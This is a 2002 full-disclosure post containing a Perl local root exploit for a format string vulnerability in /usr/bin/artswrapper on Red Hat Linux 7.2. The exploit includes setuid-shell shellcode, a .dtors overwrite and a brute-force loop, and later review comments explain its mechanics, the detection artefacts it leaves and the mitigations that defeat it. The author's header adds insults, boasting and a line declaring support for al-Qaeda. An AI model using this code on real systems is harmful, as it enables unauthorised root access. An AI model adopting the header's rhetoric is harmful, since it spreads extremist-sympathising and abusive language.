LOCAL ROOT EXPLOIT - SUPPORT FULL-DISCLOSURE - LOCAL ROOT EXPLOIT
From: "kanix THE HACKER" <kanix () twinkie com>
Date: Sat Jul 6 15:45:17 2002
Greetings. This is a local exploit for a format string vulnerability in /usr/bin/artswrapper on Red Hat Linux release 7.2 (Enigma). Sincerely, kanix
#!/usr/bin/perl
########################################################################
#
# fartsy.pl by kanix <kanix () 0xfee1dead net>
# /usr/sbin/artswrapper <local format string exploit>
# Tested on Red Hat Linux release 7.2 (Enigma)
#
# Jul 6, 2002
#
# "the secret to creativity is knowing how to hide your sources."
# - Albert Einstein
#
# commentz, job offerz, flamez, etc. should be directed to my e-mail
# address -- I WILL SCHOOL YOU ALL.
#
# SCREW THE USA! FEAR THE POWER OF .NO !@#$%!
# official supporter of the al-Qaeda Terrorist Network.
#
# BURN, BABY, BURN!!!
#
# I 0xc0ded this for fun and profit... and to get scene whorez. ;>
#
# This code is far from special - my mother could have written it,
# however, that is the extent of my ability.
#
# I can code sploits, but I know nothing of UNC file sharing! I'm
# still very 0x1337. I mean, I can code exploits, that's what makes
# you a hacker!
#
# SPECIAL NOTE TO SCRIPT KIDDIEZ: go get a playstation or something,
# there are enuff retardz in the hacker scene already (LIKE ME ;>)!
#
# Greetz: #!digit-labs, #0xfee1dead, #rootless, #!GOBBLES, synnergy,
# security.is, #hackphreak, teleh0r (fame seeking whore like
# me!), worldsex.com, badpack3t (no 0day for j00!), TEAM TESO
# AND ALL OTHER FANZ OF THE DMCA (COPYRIGHT THIS, BITCH!@#$%!)
#
# kanix: I know how the stack werkz... I AM A HACKER. OK??!?!!!
#
# kanix: can some1 pleeze tell me about DNS cache poisoning?
#
########################################################################
# --- Exploit body. NOTE(review): there is no `use strict`/`use warnings`, so
# every variable below is a package global. The notes that follow are written
# for the defender: what the script does, what it assumes, and which artefacts
# it leaves behind.
#
# $kode: i386 machine code kept as a byte string; the trailing mnemonics are
# the author's own disassembly. Read together they request syscall 0x17
# (setuid, with ebx zeroed) and then syscall 0x0b (execve) on the pushed
# string "/bin//sh" -- i.e. the payload is intended to spawn a shell with the
# target process's (setuid) privileges.
$kode =
"\x31\xdb". # xor ebx, ebx
"\xf7\xe3". # mul ebx
"\xb0\x17". # mov al, 0x17
"\xcd\x80". # int 0x80
"\x31\xc0". # xor eax, eax
"\x99". # cdq
"\x52". # push edx
"\x68\x2f\x2f\x73\x68". # push dword 0x68732f2f
"\x68\x2f\x62\x69\x6e". # push dword 0x6e69622f
"\x89\xe3". # mov ebx, esp
"\x52". # push edx
"\x53". # push ebx
"\x89\xe1". # mov ecx, esp
"\xb0\x0b". # mov al, 0x0b
"\xcd\x80"; # int 0x80
# Target binary. The mail subject advertises a local *root* exploit, which
# implies artswrapper was installed setuid-root on that system (not verifiable
# from this script). The header comment names /usr/sbin; the code uses /usr/bin.
$vuln = "/usr/bin/artswrapper";
# Hard-coded address inside the target's .dtors section, valid only for that
# exact Red Hat 7.2 build of the binary. On current toolchains the equivalent
# table (.fini_array) is mapped read-only after relocation under RELRO, so
# this write target no longer lives in writable memory. The doubled ';' is a
# harmless empty statement.
$dtors = 0x8049a7c + 4;; # I overwrite .dtors! (patent pending)
printf("\n-- /usr/bin/artswrapper local format string exploit\n");
printf("\t by kanix <kanix\@0xfee1dead.net>\n\n");
# Value the .dtors entry is to be overwritten with: a fixed stack top
# (0xc0000000) minus the NUL-terminated program path and the NUL-terminated
# payload. This presumes a non-randomised stack where the kernel places those
# strings at a predictable offset from the top; stack ASLR alone defeats it.
$ret_addr = 0xc0000000 - 4
- (length($vuln) + 1)
- (length($kode) + 1)
;
# The environment is emptied and replaced by a single variable holding the raw
# machine code -- presumably to keep the stack layout predictable. For
# detection: a setuid helper started with a one-entry environment whose value
# is binary garbage is a strong anomaly signal. With %ENV empty the shell
# below also runs without PATH, which is why $vuln must be absolute.
undef(%ENV); $ENV{'1337'} = $kode;
printf("overwriting %#.08x with %#.08x\n", $dtors, $ret_addr);
printf("bruteforcing distance (1 .. 300)\n");
sleep(2);
# Brute-force loop: $_ is the candidate argument position handed to
# sw_fmtstr_create as $dist. Each iteration runs the target once; because the
# command is one interpolated string, system() hands it to /bin/sh -c.
# system() returns the wait status, so the regex matches exit codes 0, 1, 2
# and 127 (status >> 8): any clean exit ends the loop via die("\n"), whose
# trailing newline suppresses the "at ... line" suffix. A crash (e.g. SIGSEGV,
# status 11) does not match and the next offset is tried. Up to 300 crashes of
# a setuid binary in quick succession is the loudest artefact this leaves in
# system logs.
for (1 .. 300) {
$fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);
die("\x0a") if (system("$vuln -a $fmt_str"))
=~ m/^(0|256|512|32512)$/;
}
# Builds the format string for one attempt.
#   $dest_addr - the .dtors slot to be written (4 bytes)
#   $ret_addr  - the 32-bit value to place there
#   $dist      - positional argument index used in the "%N$hn" conversions
# Returns the string as the implicit value of the final sprintf.
#
# NOTE(review): the ($$$) prototype is declared after the only call site (the
# loop above), so it is not in effect for that call; the explicit @_ count
# check below is the one that actually runs. $tmp1, $tmp2, $high, $low,
# $dest_addr1 and $dest_addr2 are never declared with 'my' and therefore leak
# out as package globals.
sub
sw_fmtstr_create ($$$)
{
die("Incorrect number of arguments for sw_fmtstr_create")
unless @_ == 3;
my ($dest_addr, $ret_addr, $dist) = @_;
# $word: offset of the upper halfword of the 4-byte target.
# $qword: the eight bytes of the two packed addresses that precede the first
# %u in the output and already count towards the written total.
my ($word, $qword) = (2, 8);
# The value is split into its upper and lower 16 bits; each half is written
# separately by one %hn (16-bit) conversion.
$tmp1 = (($ret_addr >> 16) & 0xffff);
$tmp2 = $ret_addr & 0xffff;
# %n-style counters only grow, so the smaller half is emitted first and the
# second pad is expressed relative to it; the branch picks the matching order
# of the two packed addresses. pack('L') is native byte order (little-endian
# on the i386 build targeted here).
if ($tmp1 < $tmp2) {
$high = $tmp1 - $qword;
$low = $tmp2 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr + $word);
$dest_addr2 = pack('L', $dest_addr);
}
else {
$high = $tmp2 - $qword;
$low = $tmp1 - $high - $qword;
$dest_addr1 = pack('L', $dest_addr);
$dest_addr2 = pack('L', $dest_addr + $word);
}
# Mitigation side: glibc's _FORTIFY_SOURCE=2 aborts on %n from a format string
# held in writable memory and on "%N$" positional use that skips arguments,
# which is exactly the shape of this string; -Wformat-security flags the
# underlying printf(user_string) pattern in the vulnerable program at compile
# time.
sprintf("%.4s%.4s%%%uu%%%u\$hn%%%uu%%%u\$hn",
$dest_addr1, $dest_addr2, $high, $dist,
$low, $dist + 1);
}
